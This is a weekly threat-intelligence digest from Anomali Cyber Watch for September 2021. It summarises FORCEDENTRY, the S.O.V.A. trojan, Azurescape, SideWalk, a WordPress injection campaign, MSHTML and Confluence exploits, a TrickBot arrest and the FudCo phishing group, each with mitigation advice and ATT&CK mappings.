The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, APT, Confluence, Cloud, MSHTML, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
(published: September 13, 2021)
Researchers at Citizen Labs have identified two zero-day vulnerabilities in Apple operating systems iOS, OSX and WatchOS. The vulnerabilities are being tracked as “CVE-2021-30860” and “CVE-2021-30858”. The exploit named FORCEDENTRY, targets Apple’s image rendering library which could enable arbitrary code execution from a malicious PDF file. Citizen Labs have attributed associated attacks to the NSO Group, as they observed the Pegasus malware being installed via the FORCEDENTRY exploit.
Analyst Comment: Apple have already released a patch, and are urgently advising all user to immediately update their systems.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204
Tags: CVE-2021-30860, CVE-2021-30858, FORCEDENTRY, iOS, Mac, NSO Group, OSX, Vulnerability, Zero Day
(published: September 10, 2021)
ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase and the threat actor is publicly-advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookies theft, among others. The malware author is also working on other features such as distributed denial-of-service (DDoS) and ransomware on S.O.V.A.’s project roadmap.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation.
MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle
(published: September 9, 2021)
Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering that is called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it the first cross-account container takeover in the public cloud.
Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the disclosure. Keep your cluster infrastructure up to date. Deploy policy enforcers to monitor and prevent suspicious activity in your clusters. If you were notified by Microsoft regarding this vulnerability, revoke any privileged credentials that were deployed to the platform before August 31st, 2021.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190
Tags: Azurescape, Cloud, Container-as-a-Service, CaaS, Azure Container Instances, ACI, Microsoft, Cross-Account, Container Takeover, Vulnerability
(published: September 9, 2021)
The SideWalk backdoor, which was discovered by ESET researchers in August 2021, has been attributed to the China-sponsored, cyberespionage group called Grayfly (GREF, Wicked Panda). Symantec researchers believe that Grayfly is the cyberespionage arm of APT41, whereas Blackfly represents the cybercrime activity. The SideWalk campaign was observed targeting organizations located in Mexico, Taiwan, the United States, and Vietnam with a particular focus on telecommunication companies. Targets were likely initially compromised via exploitation of multiple vulnerabilities affecting public-facing servers that include Microsoft Exchange or MySQL servers. Once SideWalk was installed, the group deployed a custom version of the open source credential-stealing tool, Mimikatz.
Analyst Comment: Information-motivated threat actors will go to great lengths to disguise and hide their activity. Backdoors that are frequently-deployed in cyberespionage campaigns will remain dormant for some time before conducting malicious activity, and then proceed to steal large amounts of data at a chosen time. Therefore, it is important to have detection and identification capabilities in place (such as Anomali Match to quickly search your infrastructure for known IOCs, in combination with a TIP (such as Anomali ThreatStream) to ingest and add context to IOCs and threat actors.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Exploitation for Credential Access - T1212 | [MITRE ATT&CK] Software Deployment Tools - T1072
Tags: Cyberespionage, Grayfly, GREF, Wicked Panda, SideWalk loader
(published: September 8, 2021)
Sucuri researchers discovered a new active evasive modular campaign where malware was injected into multiple WordPress environments. The malware redirects visitors by calling malicious files hosted on third party infected websites. The infection stores itself as encoded content in the database and is called through random functions littered throughout plugin files using a very common wordpress function "get_option". The payload is extracted from a database injection in wp_options, has the ability to bypass login authentication to access the admin panel, and comes with a built-in eval() backdoor giving remote code execution access.
Analyst Comment: Organizations should regularly monitor their web assets to detect possible exploitation by threat actors. To mitigate such risks you can lock down your wp-admin dashboard, use long and complex passwords, and consider additional firewalling solutions.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140
Tags: Get_Option, WordPress, Compromised Websites
(published: September 7, 2021)
CVE-2021-40444 is a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Several researchers are credited for reporting this vulnerability to Microsoft, as there are targeted attacks that attempt to exploit this vulnerability via malicious Microsoft Office documents. A threat actor could craft a malicious ActiveX control to be placed in a file that will activate it via the browser rendering engine. This vulnerability may affect a large number of systems as many Microsoft applications use MSHTML to render HTML content. The attack complexity is low and no prior privileges is required for the attack, but user interaction is required to open the malicious document.
Analyst Comment: As of September 12, 2021, a security patch for this vulnerability was still not available, while proof-of-concept (POC) was released, and threat actors started sharing working exploits on hacker forums. Microsoft recommends implementing mitigation and workaround measures. Until patch is available, it is recommended to disable ActiveX control components. Users should not be granted administrative privileges unless required. Documents from the internet in Protected View or Application Guard for Office, and if an unknown document prompts to “Enable Editing” users should be advised against doing so unilaterally.
MITRE ATT&CK: [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Software Packing - T1045 | [MITRE ATT&CK] Native API - T1106 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Access Token Manipulation - T1134 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Phishing - T1566
Tags: CVE-2021-40444, MSHTML, ActiveX, Windows, Microsoft, MS Office, RCE, Spearphishing
(published: September 7, 2021)
Jenkins, a leading open source automation server, had their Confluence service successfully attacked through the Confluence CVE-2021-26084 exploit. A remote code execution vulnerability, registered as “CVE-2021-26084,” has been exploited by threat actors to install a Monero cryptocurrency miner on an internal server from the “Jenkins” project. Mass exploitation of this Confluence vulnerability is ongoing and expected to accelerate. The vulnerability originates from the use of Object-Graph Navigation Language (OGNL) in Confluence’s tag system. The vulnerability permits the injection of OGNL code and thus execution of arbitrary code on computers with Confluence Server or Confluence Data Center installed. In some cases, even a user who is not authenticated can exploit the vulnerability (if the option Allow people to sign up to create their account is active). This vulnerability does not affect Confluence Cloud users.
Analyst Comment: As a large number of vulnerable Confluence instances remain exposed online, the U.S. Cyber Command has issued a special alert regarding CVE-2021-26084. Atlassian considers this vulnerability critical. Administrators should apply the patch that is available from Atlassian since August 25, 2021.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Resource Hijacking - T1496
Tags: CVE-2021-26084, Confluence, XMRig, Monero, USA, Jenkins, Cryptojacking, RCE, OGNL, Atlassian
(published: September 7, 2021)
Another alleged member of the TrickBot gang has been apprehended, this time when trying to leave South Korea. The Russian national, who is an alleged developer of the notorious crimeware, reportedly had been trapped in South Korea since February 2020 due to COVID-19 travel restrictions. He is identified only as "Mr A" and is believed to have worked as a web browser developer for TrickBot crime syndicate while he lived in Russia in 2016. The botnet was used to facilitate ransomware attacks across the US throughout 2020.
Analyst Comment: Despite multiple arrests and an October 2020 attempt to disrupt TrickBot infrastructure, it continued to adapt and launch new malware campaigns targeting organizations worldwide. Defence-in-depth helps with mitigations when an organization is dealing with multi-stage evolving malware threats.
MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003
Tags: TrickBot, Alla Witte, Banking And Finance, Ransomware, North America, Russia, South Korea
(published: September 6, 2021)
Brian Krebs updated the profile of FudCo, a Pakistani threat group that targets a number of banks, financial, and other organizations by selling spam tools and a range of services for crafting, hosting and deploying malicious email. The group sells phishing templates; products that bundle malware with benign Office documents; “scampage hosting” for phishing sites; spam distribution tools like HeartSender; and software designed to help spammers route their malicious email through compromised sites, accounts and services in the cloud. FudCo was using a shared cybercriminal identity “Saim Raza,” who for the past decade used various cybercrime sites and forums to promote a popular spamming and phishing service called “Fudtools,” “Fudpage,” “Fudsender,” etc. In 2015, the group was hiding behind a fake “branding company” website “The Manipulators”; in 2021, FudCo was found behind a shell software development company in Lahore called We Code Solutions.
Analyst Comment: Researchers from Scyla Intel briefed US prosecutors on the FudCo activities, but no actions were taken since, possibly due to difficulty documenting all the various FudCo activities. Organizations should monitor for new phishing templates targeting them. Anomali clients can subscribe to domain monitoring services that help detect new typosquatting domains.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566
Tags: FudCo, Fudtools, Fudpage, Fudsender, Saim Raza, The Manipulaters, We Code Solutions, Phishing, Phishing Templates, HeartSender, Scampage Hosting, Rameez Shahzad, Bilal Waddaich, Burhan Ul Haq, Omer Fareed, Pakistan, Karachi, Lahore
Topics:Anomali Cyber Watch